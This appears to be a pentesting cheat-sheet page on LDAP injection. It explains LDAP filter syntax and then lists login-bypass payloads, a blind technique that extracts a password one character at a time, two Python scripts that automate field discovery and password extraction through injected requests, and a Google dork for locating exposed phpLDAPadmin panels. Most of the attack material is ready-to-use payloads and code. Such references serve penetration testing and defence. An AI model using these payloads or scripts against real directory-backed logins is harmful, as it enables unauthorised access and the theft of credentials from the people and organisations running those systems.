LDAP Injection

LDAP
LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements using a local proxy.
Ports 389 y 636
EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf
EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf - 2MB
Filter = ( filtercomp )
Filtercomp = and / or / not / item
And = & filterlist
Or = |filterlist
Not = ! filter
Filterlist = 1*filter
Item= simple / present / substring
Simple = attr filtertype assertionvalue
Filtertype =   '='  /  '~=' / '>=' / '<='
Present = attr = *
Substring = attr ”=” [initial] * [final]
Initial = assertionvalue
Final = assertionvalue
(&) = Absolute TRUE
(|) = Absolute FALSE
For example:
(&(!(objectClass=Impresoras))(uid=s*))
(&(objectClass=user)(uid=*))
You can access to the database, and this can content information of a lot of different types.
The backups of LDAP uses the extension ldif
OpenLDAP: If 2 filters arrive, only executes the first one.
ADAM or Microsoft LDS: With 2 filters they throw an error.
SunOne Directory Server 5.0: Execute both filters.
It is very important to send the filter with correct syntax or an error will be thrown. It is better to send only 1 filter.
The filter has to start with: & or |
Example: (&(directory=val1)(folder=public))
(&(objectClass=VALUE1)(type=Epson*))
VALUE1 = *)(ObjectClass=*))(&(objectClass=void
Then: (&(objectClass=*)(ObjectClass=*)) will be the first filter (the one executed).
Login Bypass
LDAP supports several formats to store the password: clear, md5, smd5, sh1, ssha, crypt. So, it could be that independently of what you insert inside the password, it is hashed.
user=*
password=*
--> (&(user=*)(password=*))
# The asterisks are great in LDAPi
user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))
user=*)(|(&
pass=pwd)
--> (&(user=*)(|(&)(pass=pwd))
user=*)(|(password=*
password=test)
--> (&(user=*)(|(password=*)(password=test))
user=*))%00
pass=any
--> (&(user=*))%00 --> Nothing more is executed
user=admin)(&)
password=pwd
--> (&(user=admin)(&))(password=pwd) #Can through an error
username = admin)(!(&(|
pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSO then the user is admin and the password check is True.
username=*
password=*)(&
--> (&(user=*)(password=*)(&))
username=admin))(|(|
password=any
--> (&(uid=admin)) (| (|) (webpassword=any))
​LDAP_FUZZ
LDAP Attributes
LDAP_authBypass​
Blind LDAP Injection
You can iterate over the ascii letters, digits and symbols:
(&(sn=administrator)(password=*))    : OK
(&(sn=administrator)(password=A*))   : KO
(&(sn=administrator)(password=B*))   : KO
...
(&(sn=administrator)(password=M*))   : OK
(&(sn=administrator)(password=MA*))  : KO
(&(sn=administrator)(password=MB*))  : KO
...
Scripts
Discover valid LDAP fields
#!/usr/bin/python3
​
import requests
import string
​
fields = []
​
url = 'https://URL.com/'
​
f = open('dic', 'r') #Open the wordlists of common attributes
wordl = f.read().split('\n')
f.close()
​
for i in wordl:
    r = requests.post(url, data = {'login':'*)('+str(i)+'=*))\x00', 'password':'bla'}) #Like (&(login=*)(ITER_VAL=*))\x00)(password=bla))
    if 'TRUE CONDITION' in r.text:
        fields.append(str(i))
​
print(fields)
Special Blind LDAP Injection (without "*")
#!/usr/bin/python3
​
import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
​
flag = ""
for i in range(50):
    print("[i] Looking for number " + str(i))
    for char in alphabet:
        r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
        if ("TRUE CONDITION" in r.text):
            flag += char
            print("[+] Flag: " + flag)
            break
Google Dorks
intitle:”phpLDAPadmin” inurl:cmd.php
​https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20injection​
Last updated 11 months ago